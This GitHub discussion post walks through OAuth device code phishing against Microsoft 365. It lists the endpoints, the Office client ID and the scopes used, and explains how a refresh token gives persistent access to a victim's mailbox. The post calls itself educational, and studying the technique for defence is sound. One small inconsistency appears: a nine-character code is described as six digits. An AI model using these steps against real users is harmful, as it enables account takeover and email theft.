OAuth Device Code. How to Bypass Microsoft 365 MFA Without Credentials. #15
cfs0x
announced in
Announcements
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
WHAT IS THIS?
A deep dive into OAuth Device Code phishing. the technique that bypasses Microsoft 365 MFA without touching passwords.
This is NOT credential phishing. No fake login pages. No password harvesters.
This is weaponizing Microsoft's OWN device authentication flow.
DISCLAIMER
This post is for educational research on adversarial techniques. Understanding device code phishing is the first step toward defending against it.
HOW IT WORKS (TECHNICAL)
Step 1 – Device code request
The attacker sends a POST request to:
POST https://login.microsoftonline.com/common/oauth2/v2.0/devicecode
With:
client_id: d3590ed6-52b3-4102-aeff-aad2292ab01c (Microsoft Office official ID)
scope: https://graph.microsoft.com/Mail.Read offline_access
Microsoft responds with:
user_code: "BQ7KXKMKN" (6 digits)
device_code: (long string for polling)
verification_url: https://microsoft.com/devicelogin
Step 2 – Victim deception
The attacker sends the user_code to the victim via email, SMS, or chat.
The victim goes to microsoft.com/devicelogin (legitimate Microsoft site) and enters the code.
This is the genius of the attack. The victim types the code on the REAL Microsoft website. No fake page. No suspicion.
Step 3 – Token capture
The attacker polls the /token endpoint continuously:
POST https://login.microsoftonline.com/common/oauth2/v2.0/token
With:
grant_type: device_code
device_code: (from step 1)
client_id: (same as above)
When the victim enters the code, Microsoft returns:
access_token (1 hour)
refresh_token (90 DAYS)
Step 4 – Persistence
With the refresh_token, the attacker can:
Generate new access tokens indefinitely (every 60-90 minutes)
Access Microsoft Graph API: /v1.0/me/messages
Read, search, export ALL emails
Maintain access even if the victim changes their password
Beta Was this translation helpful? Give feedback.
All reactions